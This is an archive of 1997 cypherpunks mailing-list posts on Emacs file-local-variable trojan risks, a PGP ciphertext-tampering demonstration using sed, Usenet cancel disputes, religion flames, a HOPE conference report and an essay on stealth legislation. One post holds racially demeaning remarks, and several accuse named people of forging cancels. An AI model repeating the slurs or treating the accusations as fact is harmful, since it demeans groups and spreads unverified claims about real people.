something and it lived somewhere else on the IRIX system I was using
at the time).

I deleted it or something, and haven't been able to find it again, and
don't know enough elisp to re-create it, but it was pretty neat.  I
don't think a lot of people realise that emacs has this hook for
execing arbitrary elisp code just when you open an ordinary file, with
no filename extension.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: 



? the Platypus {aka David Formosa}  writes:

> On Thu, 7 Aug 1997, Dr.Dimitri Vulis KOTM wrote:
>
> > > What if the message is
> > > forged in such a way that it looks exactly as if it came from you?
> >
> > Ditto, and consider setting up a service to automatically issue NoCeMs
> > for forgeries.
>
> In fact consider setting up a service to automatically issue NoCeMs for
> bad pgp sigs.

As I've discussed in private e-mail with a large number of ppl, this
would be an excellent idea, and would encurage the use of digital sigs.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Sat Aug  9 11:26:07 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 10 Aug 1997 02:26:07 +0800
Subject: New Thread? / Re: Apology from me to the list and TruthMonger
In-Reply-To: <199708091402.QAA20908@basement.replay.com>
Message-ID: <3Vk7ae108w165w@bwalk.dm.com>



nobody at REPLAY.COM (Anonymous) writes:

>   Regardless, when I was thirteen, I was approached by a guy
> who stepped out of an alley and offered me $20.00 to let him
> give me a blow-job. I politely declined, and went on my way.

That guy now works for Bell North Research / Northern Telecom / Entrust
and forges thousands of cancels for Usenet articles he didn't post.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Sat Aug  9 11:26:25 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 10 Aug 1997 02:26:25 +0800
Subject: Platypus and the kangaroos
In-Reply-To: 
Message-ID: 



? the Platypus {aka David Formosa}  writes:
>
> > [2] Have any of the "others" been kangaroos?
>
> No there too high sprung for me. (Pity though 'roos have two virginas,
> care to double your fun :D)

I read a very interesting article (lost the reference) about the various
kinds of genital mutilation practiced by your aborigines.  Removing the
foreskin as some barbaric semitic tribes taught the equally barbaric
Americans to do is nothing.  Some tribes cut a hole at the base of the penis
so urine and/or semen get evacuated through this hole. This serves as
a nice birth control device: the only way an abo can get his girlfriend
pregnant is to intentionally pick up his ejaculate (the artificial hole
is outside the vagina) and stick it in with his fingers.

Yet other tribes slice up their penises lengthwise, so there are two
halves pointing right and left. (To stick them into an orifice of
any sort, someone must hold them together.) Supposedly this has something
to do with the kangaroo being their totem animal!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From aba at dcs.ex.ac.uk  Sat Aug  9 11:49:33 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sun, 10 Aug 1997 02:49:33 +0800
Subject: pgp -c undetectable change to ciphertext? (was Re: Hipped on PGP)
In-Reply-To: 
Message-ID: <199708091742.SAA02232@server.test.net>




Ian Grigg  writes:
> [Gary Howland gives talk at HIP on technical PGP flaws, 0xDEADBEEF etc]
>
> And for the record, whilst Gary's attack to change conventionally
> encrypted files without detection was unknown to the PGP team at the
> moment, we can be sure that it will be addressed.

Hmm.  Change pgp -c files you say.  Lets see... do you mean this:

% echo hello world > junk
% pgp -c +compress=off -zfred junk
% sed 's/....$/adam/' < junk.pgp > junk2.pgp
% pgp -zfred junk2.pgp
% cat junk2
hello wo�P?t

That much is obvious.

(pgp doesn't complain or even notice the above btw ... there is no
checksum and so you can just garble the file, if you so wish, and pgp
won't complain).

Or did Gary find a way to undetectably modify ciphertext without
turning off compression?

Could you or he elaborate on your attack?  

Eternity server code is using pgp -c (but with compression on), and
some remailer reply blocks (presumably with compression on), so it
could be relevant if you've come up with an attack which works with
compress=on.

If you're using PGP with compress=on, then I suspect your chances of
undetectably modifying the ciphertext and still coming up with
something which is a valid compressed packet is fairly low.  I wonder
how low.  

Probably not low enough cryptographically, if you were using this in a
automated environment, where people could hit a server with garbled
packets repeatedly until one happened to decompress, and pass the
compression codes internal checksum.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: 



Tim Skirvin  writes:

> "Dr.Dimitri Vulis KOTM"  writes:
> >>>> 	Not accepted ones.  They're treated as rogues, and asked to stop
> >>>> it, and you know it.
> >>> Net.Scum like [...] Tim Brown,
> >> Tim Brown is not an accepted canceler.
> >
> > As challenged, I've listed 3 dozen "spam cancellers" caught slipping cancels
> > forged for "non-spam" among their "spam cancels".
>
> 	And how many of them are considered accepted cancellers?

None of them are considered "accepted cancellers" by me.

If your news server processes cancels, then it processes the cancels forged by
this scum whether or not you consider them "accepted cancellers".

You seem to imply that there's a choice whose forged cancels to process, which
is not true in general (unless one aliases out the site used to forge
cancels).

You also lied when you claimed that Jan Isley only forges cancels for articles
cross-posted in "his" local alt.* hierarchy, Ehud Gavron only forges cancels
for cross-posts in "his" az.*, etc - not that this would have been an excuse,
but all of these scumbags have been caught forging cancels for articles posted
only in unmoderated "big 6" newsgroups once, as documented on their respective
Net.Scum pages.

> > What difference does it make whether Tim Skirvin considers someone an
> > "accepted" or "rogue" canceller?
>
> 	Because there's rules set up around the concept of 'accepted
> cancellers' to ensure accountability and at least limited choice.  I find
> these things important, because they reduce the danger of cancels
> significantly.

Fact 1: Tim Skirvin, his friends, and and their "rules" are irrelevant,
impotent, isolated, and ignored.

> 	Tim Brown broke the rules blatantly.

Fact 2: Tim Brown, Jan Isley, Chris Lewes, Bob Curtis, Ehud Gavron, and the
rest of the self-appointed "spam cancellers" break the rule that says you
should forge cancels for articles you didn't post. As for _your_ rules, see
Fact 1 above.

> > Tim Skirvin is under no obligation to disseminate the information that he
> > feels shouldn't be publicly available ("security through obscurity").
> > However since he chooses to present himself as the author of the "official"
> > FAQ on usenet Cancels (actually, substantually plagiarized from the Cancel
> > FAQ that David Stodolsky used to post), a more honest way to deal with the
> > questions he doesn't want to answer would be to either omit the question
> > altogether, or to state that he doesn't want to answer the question.
>
> 	I've already answered this (look at the most recent version of the
> FAQ, Dimitri), but I would like to say that there is no plagarization in
> my FAQ.

Anyone can compare David Stodolsky's "Cancel FAQ" with Tim Skirvin's "Cancel
FAQ" and verify that substantial portions (most of the technical discussion on
how cancels work; the discussion of why people issue cancels; et al) have been
copied without attribution. (Tim Skirvin also flames Stodolsky in his FAQ.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From markm at voicenet.com  Sat Aug  9 12:35:01 1997
From: markm at voicenet.com (Mark M.)
Date: Sun, 10 Aug 1997 03:35:01 +0800
Subject: emacs virus (was Re: JOIN THE CREW)
In-Reply-To: <199708091105.MAA00941@server.test.net>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 9 Aug 1997, Adam Back wrote:

> I deleted it or something, and haven't been able to find it again, and
> don't know enough elisp to re-create it, but it was pretty neat.  I
> don't think a lot of people realise that emacs has this hook for
> execing arbitrary elisp code just when you open an ordinary file, with
> no filename extension.

>From the Emacs FAQ:

72:  Are there any security risks in GNU Emacs?

[...]
  * the file-local-variable feature (Yes, a risk, but easy to change.)

    There is an Emacs feature that allows the setting of local values for
    variables when editing a file by including specially formatted text
    near the end of the file.  This feature also includes the ability to
    have arbitrary Emacs Lisp code evaluated when the file is visited.
    Obviously, there is a potential for Trojan horses to exploit this
    feature.

    If you set the variable inhibit-local-variables to a non-nil value,
    Emacs will display the special local variable settings of a file that
    you visit and ask you if you really want them.  This variable is not
    mentioned in the manual.

    It is wise to do this in lisp/site-init.el before building Emacs:

      (setq inhibit-local-variables t)

    If Emacs has already been built, the expression can be put in
    lisp/default.el instead, or an individual can put it in their own
    .emacs file.

    The ability to exploit this feature by sending e-mail to an Rmail user
    was fixed sometime after Emacs 18.52.  However, any new package that
    uses find-file or find-file-noselect has to be careful about this.

    For more information, see `File Variables' in the on-line manual
    (which, incidentally, does not describe how to disable the feature).



Mark
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBM+zEgSzIPc7jvyFpAQGdEAf+JBDo4zXNwcbq91NmvT+68tARgd4CfCRS
RVfykuPP7jOFQ2D+jf5D06ZZzb+A98BnnnxQfa8PTi4qC6UmUseB14NVoOs1NLcI
6H5uLcM2gy5+FZdcgycGRhaN+e52CCYbcjnjlgGONPeddp+9Au+OAZH3lD7eSnoE
jvW3f4l3ThkTH1OBi2+NGzT/iRwPPfs+ExdSH6QrxkLuCw7T/yJtjo/bptovQm1P
T1fqu7Dpk/4oUtD1760QuNCC3RCNsrU6z+AqMnPTmYdOh2MJK8G8pMferhD7Jy9h
uVkrfMeqYtiUa1x8Qu9NNu2vKThvP/xhf0S/wzTgaDwsHKGVy6kJoQ==
=2xcf
-----END PGP SIGNATURE-----






From enoch at zipcon.net  Sat Aug  9 14:03:12 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Sun, 10 Aug 1997 05:03:12 +0800
Subject: Masons and Fnords
In-Reply-To: 
Message-ID: <19970809205358.24496.qmail@zipcon.net>



Tim May writes:

> Actually, _all_ of the Founders were Masons. Tim Bob says check it out.

Correct.  Thomas Jefferson, Ben Franklin, and others were Deists, and
Masons, and would have laughed hysterically at the absurd notion of the
divinity of Jesus Christ.

In fact, Jefferson once attributed the large mass of Christian theological
writings to the fact that "Nonsense can never be explained."

It is most entertaining that in spite of these undisputed historical
facts, the modern day Christian FunnyMentalists continue to spew forth the
revisionist notions that the Founding Fathers were Christians, and that
the United States was founded as a "Christian Nation." 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From rah at shipwright.com  Sat Aug  9 15:21:06 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Sun, 10 Aug 1997 06:21:06 +0800
Subject: Masons and Fnords
In-Reply-To: 
Message-ID: 



At 4:53 pm -0400 on 8/9/97, Mike Duvos wrote:


> Correct.  Thomas Jefferson, Ben Franklin, and others were Deists,

Well, Unitarians like to claim Jefferson, because of a nice letter he wrote
to Joseph Priestly. Of course, we like to claim *all* the cool people...

> and
> Masons, and would have laughed hysterically at the absurd notion of the
> divinity of Jesus Christ.

Agreed.

Of course, exactly how a self-proclaimed congenital Republican small-"a"
crypto-anarchist like me got to be a Unitarian, well, only, um, God, knows.

She must be laughing somewhere...

Cheers,
Bob Hettinga


"Religeon is like dandruf..." -- Robert Heinlein

-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From rah at shipwright.com  Sat Aug  9 15:32:39 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Sun, 10 Aug 1997 06:32:39 +0800
Subject: Subsect?
In-Reply-To: <33EC2214.6BEA2C9A@cyberspacetechnologies.com>
Message-ID: 



At 12:43 pm -0400 on 8/9/97, Tim May wrote:
> Unless JC had a time machine, Judaism predates Xtianity.

Clearly you haven't read Paradise Lost...

;-).

Cheers,
Bob Hetttinga

-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From jf_avon at citenet.net  Sat Aug  9 15:38:55 1997
From: jf_avon at citenet.net (jf_avon at citenet.net)
Date: Sun, 10 Aug 1997 06:38:55 +0800
Subject: TruthMonger's standards...
In-Reply-To: <199708091402.QAA20908@basement.replay.com>
Message-ID: <199708092210.SAA06425@cti06.citenet.net>



On  9 Aug 97 at 16:02, TruthMonger wrote

>   Life is a crapshoot, and the most we can hope for is to use our
> best judgement to minimize whatever ill effects might occur as 
> the result of haphazard circumstance.

I have to slightly disagree on the quoted sentence, extracted from an 
otherwise super extra excellent post.

IMO, life is not a crapshoot, it simply "is".  Reality Is.  So, you 
just have to deal with it.  

Now, arguing about the non-existence of Good or Bad, you 
interestingly use your own scale of Good and Bad.  So, clearly, there 
*is* some sort of standard.

Only, you seems to hold as a basic premise that the standard can not 
be codified because it doesn't meet the simplicistic criterias that 
you describe.   please don't build a straw man and shoot it down 
afterward.

The sentence "Well, it works in theory but it doesn't in practice" is 
absolute bullshit and an attempt at invalidating reason.  Which
theoretician with a milligram of self respect would come up with a 
theory that comes in contradiction to the best observation of 
Reality we can do?  

My own rule about morality is the following: any rule that is good 
for the harmonious development and life of the Human Animal is a good 
one.  Anything that has an effect contrary to the first rule is 
"bad".  And there are many things that are neither good or bad also.

Now, good and bad are highly context dependent.  In your example, you 
show a situations where some peoples made context-dependent decisions 
while not fully analysing the context.  To do such analyse requires 
efforts and time, which are not always available.  You then proceed 
to build scenario inquiring more deeply in the context of the 
situation and figure out that the decision *might* have been wrong.

So, clearly, you *do* have some standard underlying your statements.

JFA       "life" is a sexually transmitted terminal condition






From alan at ctrl-alt-del.com  Sat Aug  9 16:14:55 1997
From: alan at ctrl-alt-del.com (Alan)
Date: Sun, 10 Aug 1997 07:14:55 +0800
Subject: The BIG Lie (Jesus Confesses)
In-Reply-To: <199708081253.GAA06495@wombat.sk.sympatico.ca>
Message-ID: <3.0.2.32.19970809155403.04096a20@ctrl-alt-del.com>



At 06:26 PM 8/8/97 -0400, David D.W. Downey wrote while wearing a big "Kick
Me!" sign:

>You know, you are just about the biggest idiot I have ever had the
>displeasure of reading. 

You are new here, huh?

>For one, the largest religion in the US right
>now *is* in fact judeo-christian.

Sorry, "Jews for Jesus" is not quite that big.  They are about the only
faith that quite fits that label.  (Unless you count the all-inclusive
Bahai or the ALL-IN-ONE faith of Dr. Bronner.)

Oh, you mean Christian...  Trying to lump all Christian belief together
(along with Judaism) is like trying to lump all governments together and
claim they have the same laws.

> The largest is Roman Catholic 

Which some Christian sects argue is not Christian.  (For an extreme view of
this, read the tract "The Death Cookie" published by Jack T. Chick. It can
be obtained from http://www.jackchick.com/ .)

>with
>Pentacostal Protestant following right behind.

With big pointy knives...

The biggest growth in the Pentecostal church was during the Reagan
administration, when they emptied the mental hospitals.  Didn't your mother
ever tell you that just because all your friends are speaking in tongues,
it doesn't make it any less silly?

Just because lots of people believe a stupid thing, it does not make it any
less stupid.

> Next, this country was
>founded on christian beliefs, or have you failed to read the words of
>the constitution of the US.

Sounds like you have been prowling Christian book stores again.  Maybe you
should read the writings of the Founding Fathers and not just the books
your church has authorized for you.

A few suggestions:

-- The Age of Reason by Thomas Paine

   This book should be required reading for all Christians.  A expose of the
   difference between what the church tells you and what the Bible actually
   says.  (For a more condensed version take a look at:

.)
   
-- The Virginia Act For Establishing Religious Freedom by Thomas Jefferson 


   This law was the basis of the separation of church and state in the
   constitution.  Read this and see if they were basing the country on your
   faith.

There are many others...

The founders of this country were of many different belief systems.  Many
of them were hated and reviled by the clerics of their day.  Of course,
evangelical Christians gloss over these facts in an effort to continue
their ~2,000 years of enslavement of the minds of men.

> Considering the apparent ignorance you have
>displayed thus far about the makeup of the US, I would venture to say
>that you probably have not read it. 

I am willing to bet that you have not either...  (Except for the excerpts
quoted in the books pushing the idea to the willing flock, written by the
Christians who wish to perpetuate the fraud.)

What in the Constitution makes you think that it was the Christian God that
was being mentioned and not the God of Deists?

>Next, you attack christians for
>trying to control the content made available on the internet. 

At last!  The plan exposed!  Damn right he attacks you!  But Christians get
pretty touchy when faced with criticism of their agenda.  (Or mentioning
that their beliefs are NOT the word of God, of exposing the flaws in
Christianity, or having any view that conflicts with the "One True God(tm)".)

>At least
>the site ratings plan is better than alot of other plans I have seen.

In other words, you can claim it is voluntary and make it look like you are
giving people a choice as you push your morality down their throats.  The
Bible Beaters try to impose their views of what is right and wrong, but get
pretty offended and huffy when others try and do the same thing.  (Like
when they push School Prayer, but freak out when the pagans want the same
options.)

How would you react if the ratings groups were stacked with Athiests,
Wiccans, Tantrics, and Jainists?  Would you be willing to accept their
judgements on the acceptability of your beliefs and speech?

I didn't think so.

>Besides, Oh Godlike TruthMonger, where is *your* surefire plan to halt
>the spread of trash that *most* humans would want out of of the reach of
>their children?

*Most* humans want their children to grow up ignorant about sex and the
outside world?

What about texts that are used as justification to commit mass murder and
enslavement?  How are you going to rate those?  (Books that teach that it
is right and proper to go off and kill your neighbors because they do not
believe in your God and happen to be on land your deity covets.)  Oh
wait...  That is the current dominant religion.  Can't censor that!

Children need to be challenged by ideas that are different from their own.
If they are not, then they grow up with ideas that they cannot
intellectually defend.  They grow up intelecually squishy.

I have known far too many Christians who never read anything that
challenges their basic belief structure.  Nothing that could dare shake
their faith in God and the Bible.  In their isolation, they are taught to
believe ideas that have no rational defense.  (Like Biblical inerrancy and
Creationism.)  When challenged, these outcasts from reason have to rely on
the "moral authority" of their unseen God or other appeals to authority to
try and defend their irrational beliefs.

If the rules your faith proposes were enforced impartially, your "holy
book" would be amongst the burned and censored.

> I have not seen you *once* offer a straightforward clear
>cut plan to efficiently handle *any* issue placed for discussion on this
>listserv. I have seen you do nothing but slam, belittle, and degrade
>others and their beliefs and ideas. You do this under the unimpressive
>tag of "TruthMonger".

But since "TruthMonger" is an anonymous identity and a nym for someone
else, you have no idea that this is true.  (Actually it is not.
TruthMonger has made a number of suggestions, but they conflict with your
worldview.)  But I forgot...  You believe in Jesus.  (The original urban
legend...)  You have infallible insight into the way things should be.

Some to think of it, I have not seen you post any suggestions at all.  Just
this weeny little screed when your belief structure is threatened.

> If anything, you are anything but a TruthMonger.
>When you can come up with a plan that even *remotely* seems like a
>logically thought out, planned, and intelligent proposal on how to
>handle the issues presented everyday on the internet that affect the
>computing industry balanced with a concern for the children, then I will
>listen. (And yes, I do agree that the parents of the children have an
>obligation to monitor the content they are exposed to. It's called
>responsible parenting which unfortunately is not a well practiced
>ideology.

"When you can come up with a way to censor the net, then I will believe you."

"When you come to accept my priorities and my belief system, then I will
listen."

"When you come up with a plan that meets MY goals, then we'll talk."

Of course "concern for the children" is just another way of saying
"eliminating content that offends the parents".

If you don't want your children exposed to "information that might harm
them", then don't let them on the net.  The net was never designed or meant
to be a "family friendly" environment.  It was meant as a way for ADULTS to
exchange information.  Of course, your kind would like to reduce the
intellectual and emotional content of the net to that of a mythical twelve
year old...  Nothing to offend or challenge your beliefs...  (So you can
keep your kids in the same mental gulag that you have imposed on your own
minds.)

Maybe you need to ask yourself *WHY* this material offends you so much?

"Protecting children" is the first refuge of the censor.

>And to take the wind out of your sales, I have 2 children and
>as a parent I limit them to what is appropriate to their ages.)

I guess there is a seeker born every minute...

Or at least, what you perceive that to be...  I find it sad that you have
reproduced at all.  Hopefully your children will learn to seek information
not filtered through the eyes of the bible-believer.  

> Until
>such time as you can fulfill the obligations to us, the adult computing
>population, and our offspring, the children (just in case your fuddled
>mind does not know what they are), I suggest you rest those busy little
>fingers of yours and listen to the underlying theme of the issues before
>us.

What obligation is that?  I have no obligation to you and I SERIOUSLY doubt
if you represent the "computing public".  (Or at least, I hope not, though
that might explain COBOL...)

I think you need to reread what you wrote there.  

We have no obligation to you or your "God".  Our tongues shall not praise,
nor shall we kneel.  

We shall oppose your attempted dominion over the minds and bodies of men.

We will not bend over for the rod and staff of Jesus.

We shall will paragraphs.

> Until then, HateMonger, I have one suggestion for you..... Shut Up!

Or what?  Will Daddy spank?

I think you need to get a better connection to a clue server.

Or in the words of Crow T. Robot: "Bite me!"


---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano at teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan at ctrl-alt-del.com|






From jya at pipeline.com  Sat Aug  9 17:49:53 1997
From: jya at pipeline.com (John Young)
Date: Sun, 10 Aug 1997 08:49:53 +0800
Subject: HOPE Not
Message-ID: <1.5.4.32.19970810000911.00697704@pop.pipeline.com>



Comments on two of the many HOPE sessions: those of 
L0pht and Bruce Schneier:

L0pht summarized their current campaign to test
security on behalf of the consumer, having found
that corporations refuse to publicize or correct
holes L0pht reported in confidence.

L0pht cited, among others, the Mac security features 
and products coming to market, which they think have 
been too hastily readied for grafting onto other 
programs and and are vulnerable due to inadequate 
design, integration and testing. Like too many MS 
flood-the-market programs.

Bruce outlined the principal elements of the security
challenge and the role of cryptography among those
of people, hardware, facilities, law and policy. He
warned of the weakness of relying on crypto in the overall 
security matrix and cautioned that crypto is not the 
main answer to the security problem, which is primarily 
one of human frailty and criminal behavior, and that 
it will take a combination of solutions involving: 

  Strong and efficient encryption -- key length is 
  not critical

  Tamper resistant hardware -- software can be protected 
  by math

  Trust management -- reliable authentication and 
  certification; GAK is too complicated to ever work

  Jurisdiction -- criminals must not be able to operate 
  from the most obliging state

  Law -- punishment for criminal acts

He emphasized that mathematics and software are not the 
problem of insecure systems, it is humans and the impossibility
of predictable interface with machines. Every system is vulnerable
to attack, not at its strongest but at its weakest. Brute force
is not an attack worth worrying about, although it gets most
of the publicity. What's worrisome is the out of the way fault
in the fortress, the one nobody expects, the one the enemy
ever seeks by hook, crook, bribe and trick. (HOPE's agenda?)

It was a provocative, informative, many-faceted presentation,
and could become an article, maybe a book, surely an
effective business lure.

He closed by citing "Those who think cryptography is the answer
to security do not understand the problem and do not understand 
cryptography."

Bruce did not provide paper copy of the slides but said he
will send it upon e-mail request to:

   schneier at counterpane.com

Coda:

Most surprising about HOPE was that everyone, M/F, was dressed in 
brass-button blazers, oxford whites, rep ties and gray flannels;
spit-shined caps, Shasti barbered, smelled of Camay; murmured 
"well said" to the eloquent speakers, softly sniffed for salient 
points, chatted at tea, "swell show, don't you think."

None of the ripe rank of cavities and pits,dreadlocks and skulls, 
vulgar tees and shreds, toilet squalor and slime,  chest-caving 
music, vile hoots and whistles of "phreak Ma B, crack Mr. Softie," 
crazed eyeballs assaulting gameboxes, deformed bods struggling 
to get in against those escaping Bedlam, none of that at Beyond 
Hope, not at all, that was outside in the gutters of Manhattan, 
defiling a tux and gown wedding party upstairs at Puck.







From nobody at rigel.cyberpass.net  Sat Aug  9 18:33:34 1997
From: nobody at rigel.cyberpass.net (WinSock Remailer)
Date: Sun, 10 Aug 1997 09:33:34 +0800
Subject: LAND-MINE LEGISLATION
Message-ID: <199708100106.SAA22881@sirius.infonex.com>




LAND-MINE LEGISLATION

by Claire Wolfe

Let me run by you a brief list of items that are "the law" in
America today.  As you read, consider what all these have in
common.

1.  A national database of employed people.
2.  100 pages of new "health care crimes," for which the penalty
is (among other things) seizure of assets from both doctors and
patients.
3.  Confiscation of assets from any American who establishes
foreign citizenship.
4.  The largest gun confiscation in U. S. history--which is also
an unconstitutional ex post facto law and the first law ever to
remove people's constitutional rights for committing a
misdemeanor.
5.  A law banning guns in ill-defined school zones; random
roadblocks may be used for enforcement; gun-bearing residents
could become federal criminals just by stepping outside their
doors or getting into vehicles.
6.  Increased funding for the Bureau of Alcohol, Tobacco and
Firearms, an agency infamous for its brutality, dishonesty and
ineptitude.
7.  A law enabling the executive branch to declare various groups
"terrorist"--without stating any reason and without the
possibility of appeal.  Once a group has been so declared, its
mailing and membership lists must be turned over to the
government.
8.  A law authorizing secret trials with secret evidence for
certain classes of people.
9.  A law requiring that all states begin issuing drivers'
licenses carrying Social Security numbers and "security features"
(such as magnetically coded fingerprints and personal records) by
October 1, 2000.  By October 1, 2006, "Neither the Social
Security Administration or the Passport Office or any other
federal agency or any state or local government agency may accept
for any evidentiary purpose a state driver's license or
identification document in a form other than [one issued with a
verified Social Security number and  security features']."
10.  And my personal favorite--a national database, now being
constructed, that will contain every exchange and observation
that takes place in your doctor's office.  This includes records
of your prescriptions, your hemorrhoids and your mental illness.
It also includes--by law--any statements you  make ("Doc, I'm
worried my kid may be on drugs," "Doc, I've been so stressed out
lately I feel about ready to go postal.") and any observations
your doctor makes about your mental or physical condition,
whether accurate or not, whether made with your knowledge or not.
For the time being, there will be zero (count  em, zero) privacy
safeguards on this data.  But don't worry, your government will
protect you with some undefined "privacy standards" in a few
years.

All of the above items are the law of the land.  Federal law.
What else do they have in common?

Well, when I ask this question to audiences, I usually get the
answer, "They're all unconstitutional."

True.

My favorite answer came from an eloquent college student who
blurted, "They all SUUUCK!"

Also true.

But the saddest and most telling answer is: They were all the
product of the 104th Congress.  Every one of the horrors above
was imposed upon you by the Congress of the Republican
Revolution--the Congress that pledged to "get government off your
back."

All of the above became law by being buried in larger bills.  In
many cases, they are hidden sneak attacks upon individual
liberties that were neither debated on the floor of Congress nor
reported in the media.  For instance, three of the most horrific
items (the health care database, asset confiscation for foreign
residency and the 100 pages of health care crimes) were hidden in
the Kennedy-Kassebaum Health Insurance Portability and
Accountability Act of 1996 (H.R. 3103).  You didn't hear about
them at the time because the media was too busy celebrating this
"moderate, compromise" bill that "simply" ensured that no
American would ever lose insurance coverage due to a job change
or a preexisting condition.

Your legislator may not have heard about them, either.  Because
he or she didn't care enough to do so.

The fact is, most legislators don't even read the laws they
inflict upon the public.  They read the title of the bill (which
may be something like "The Save the Sweet Widdle Babies from Gun
Violence by Drooling Drug Fiends Act of 1984").  They read
summaries, which are often prepared by the very agencies or
groups pushing the bill.  And they vote according to various
deals or pressures.

It also sometimes happens that the most horrible provisions are
sneaked into bills during conference committee negotiations,
after both House and Senate have voted on their separate versions
of the bills.  The conference committee process is supposed
simply to reconcile differences between two versions of a bill.
But power brokers use it for purposes of their own, adding what
they wish.  Then members of the House and Senate vote on the
final, unified version of the bill, often in a great rush, and
often without even having the amended text available for review.

I have even heard (though I cannot verify) that stealth
provisions are written into some bills after all the voting has
taken place.  Someone with a hidden agenda simply edits them in
to suit his or her own purposes.  So these time bombs become
"law" without ever having been voted on by anybody.  And who's to
know?  If congresspeople don't even read legislation before they
vote on it, why would they bother reading it afterward?  Are
power brokers capable of such chicanery?  Do we even need to ask?
Is the computer system in which bills are stored vulnerable to
tampering by people within or outside of Congress?  We certainly
should ask.

Whether your legislators were ignorant of the infamy they were
perpetrating, or whether they knew, one thing is absolutely
certain: the Constitution, your legislator's oath to it, and your
inalienable rights (which precede the Constitution) never entered
into anyone's consideration.

Ironically, you may recall that one of the early pledges of Newt
Gingrich and Company was to stop these stealth attacks.  Very
early in the 104th Congress, the Republican leadership declared
that, henceforth, all bills would deal only with the subject
matter named in the title of the bill.

When, at the beginning of the first session of the 104th, pro-gun
Republicans attempted to attach a repeal of the "assault weapons"
ban to another bill, House leaders dismissed their amendment as
not being "germane."

After that self-righteous and successful attempt to prevent
pro-freedom stealth legislation, Congresspeople turned right
around and got back to the dirty old business of practicing all
the anti-freedom stealth they were capable of.

Three other items on my list (ATF funding, gun confiscation and
school zone roadblocks) were also buried in a big bill--H.R.
3610, the budget appropriation passed near the end of the second
session of the 104th Congress.

No legislator can claim to have been unaware of these three
because they were brought to public attention by gun-rights
groups and hotly debated in both Congress and the media.  Yet
some 90 percent of all congresspeople voted for them--including
many who claim to be ardent protectors of the rights guaranteed
by the Second Amendment.

Why?

Well, in the case of my wrapped-in-the-flag, allegedly pro-gun,
Republican congressperson: "Bill Clinton made me do it!"

Okay, I paraphrase.  What she actually said was more like, "It
was part of a budget appropriations package.  The public got mad
at us for shutting the government down in 1994.  If we hadn't
voted for this budget bill, they might have elected a Democratic
legislature in 1996--and you wouldn't want THAT, would you?"

Oh heavens, no!  I'd much rather be enslaved by people who spell
their name with an R than people who spell their name with a D.
Makes all the difference in the world!

The Republicans are fond of claiming that Bill Clinton "forced"
them to pass certain legislation by threatening to veto anything
they sent to the White House that didn't meet his specs.

In other cases (as with the Kennedy-Kassebaum bill), they proudly
proclaim their misdeeds in the name of bipartisanship--while
carefully forgetting to mention the true nature of what they're
doing.

In still others, they trumpet their triumph over the evil
Democrats and claim the mantle of limited government while
sticking it to us and to the Constitution.  The national database
of "workers" was in the welfare reform bill they "forced" Clinton
to accept.  The requirement for SS numbers and ominous "security"
devices on drivers licenses originated in their very own
Immigration Control and Financial Responsibility Act of 1996,
H.R. 2202.

Another common trick, called to my attention by Redmon Barbry,
publisher of the electronic magazine Fratricide, is to hide
duplicate or near-duplicate provisions in several bills.  Then,
when the Supreme Court declares Section A of Law Z to be
unconstitutional, its kissing cousin, Section B of Law Y, remains
to rule us.

Sometimes this particular form of trickery is done even more
brazenly; when the Supreme Court, in its Lopez decision, declared
federal-level school zone gun bans unconstitutional because
Congress demonstrated no jurisdiction, Congress brassily changed
a few words.  They claimed that school zones fell under the
heading of "interstate commerce."  Then they sneaked the
provision into H.R. 3610, where it became "law" once again.

When angry voters upbraid congresspeople about some Big
Brotherish horror they've inflicted upon the country by stealth,
they claim lack of knowledge, lack of time, party pressure,
public pressure, or they justify themselves by claiming that the
rest of the bill was "good."

The simple fact is that, regardless of what reasons legislators
may claim, the U. S. Congress has passed more Big Brother
legislation in the last two years--more laws to enable tracking,
spying and controlling--than any Democratic congress ever passed.
And they have done it, in large part, in secret.

Redmon Barbry put it best: "We the people have the right to
expect our elected representatives to read, comprehend and master
